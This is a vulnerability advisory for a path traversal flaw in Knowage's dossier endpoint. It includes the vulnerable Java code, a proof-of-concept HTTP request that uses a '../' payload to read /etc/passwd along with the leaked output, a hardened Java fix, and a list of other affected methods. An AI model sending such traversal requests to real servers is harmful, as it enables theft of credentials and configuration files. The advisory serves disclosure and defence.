CVE-2023-36819: Path traversal in download functionalities

Knowage is a professional open source suite for modern business analytics over traditional sources and big data systems. The endpoint /knowage/restful-services/dossier/importTemplateFile allows authenticated users to download templates hosted on the server. However, starting in the 6.x.x branch and prior to version 8.1.8, the application does not sanitize the templateName parameter, allowing an attacker to use ../ in it to escape the directory where templates are normally placed and download any file from the system. This vulnerability allows a low-privileged attacker to exfiltrate sensitive configuration files. This issue has been patched in Knowage version 8.1.8.


Package

KnowageLabs / Knowage-Server (Knowage)

Affected versions

6.x.x, 7.x.x, 8.0.x, < 8.1.8

The endpoint /knowage/restful-services/dossier/importTemplateFile allows authenticated users to download templates hosted on the server.

// knowage-core/src/main/java/it/eng/spagobi/api/DossierActivityResource.java
@Path("/resourcePath")
public Response getresourcePath(@QueryParam("templateName") String fileName) throws JSONException {
    // [...]
    // The user-controlled fileName is concatenated straight into the filesystem path.
    String outPath = SpagoBIUtilities.getResourcePath() + separator + "dossier" + separator + fileName;
    // [...]
    File file = new File(outPath);
    // [...]
    try {
        bytes = Files.readAllBytes(file.toPath());
        responseBuilder = Response.ok(bytes);

However, the application does not sanitize the templateName parameter, allowing an attacker to use "../" in it to escape the directory where templates are normally placed and download any file from the system.

In the following example Synacktiv experts were able to retrieve the /etc/passwd file from the server hosting the application.

GET /knowage/restful-services/dossier/resourcePath?templateName=../../../../../../etc/passwd HTTP/1.1
Host: knowage.local:8088
Cookie: JSESSIONID=8C072A9A51CBFBA80049298EC4757C6D

HTTP/1.1 200 
Date: Mon, 27 Jun 2022 17:34:21 GMT
[...]

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
[...]
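The following is an added example, not Knowage's code: it places the concatenation pattern from the advisory next to a hardened variant that resolves the name against the template directory, normalizes it and refuses anything that ends up outside. The class and method names, the base path and the sample names are constructed for illustration.

```java
import java.nio.file.Path;
import java.nio.file.Paths;

public class DossierPathCheck {

    // Vulnerable pattern (same shape as the advisory's snippet): the
    // user-controlled name is concatenated into the path and nothing checks
    // where the resulting path actually points.
    static String vulnerableOutPath(String resourcePath, String fileName) {
        String separator = java.io.File.separator;
        return resourcePath + separator + "dossier" + separator + fileName;
    }

    // Hardened variant: resolve against the template directory, normalize
    // away "." and ".." segments, then verify the result is still a strict
    // descendant of that directory. An absolute fileName resolves to itself
    // and therefore fails the startsWith check as well.
    // Returns null when the name must be rejected.
    static Path safeTemplatePath(Path resourcePath, String fileName) {
        Path templateDir = resourcePath.resolve("dossier").toAbsolutePath().normalize();
        Path candidate = templateDir.resolve(fileName).toAbsolutePath().normalize();
        if (!candidate.startsWith(templateDir) || candidate.equals(templateDir)) {
            return null;
        }
        // normalize() is purely lexical: if symlinks inside the template
        // directory are a concern, repeat the check on candidate.toRealPath()
        // once the file is known to exist.
        return candidate;
    }

    public static void main(String[] args) {
        Path base = Paths.get("/opt/knowage/resources"); // constructed base path
        String benign = "report.json";
        String traversal = "../../../../../../etc/passwd";

        System.out.println("vulnerable: " + vulnerableOutPath(base.toString(), traversal));
        System.out.println("hardened, benign name: " + safeTemplatePath(base, benign));
        System.out.println("hardened, traversal:   " + safeTemplatePath(base, traversal));
    }
}
```

A denylist that strips "../" from the parameter is not an adequate substitute: encoded or repeated sequences can survive it, while the containment check above reasons about the resolved path itself.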

It's important to note that this is not the only place a path traversal attack could be performed; however, the other vulnerable endpoints either require more privileges, or append other strings to the attacker-controlled path, making exploitation harder.

For example the following methods are also affected by this kind of vulnerability:

  • knowage-core/src/main/java/it/eng/spagobi/api/DataSetResource.java@cloneFile
  • knowage-core/src/main/java/it/eng/spagobi/engines/chart/service/GetPngAction.java

Impact

This vulnerability allows a low-privileged attacker to exfiltrate sensitive configuration files such as:

  • Database credentials;
  • The HMAC key, which can be used to craft JWT tokens;
  • Tomcat credentials if the manager interface is enabled.

Patches

You need to upgrade to Knowage 8.1.8 or a later version.
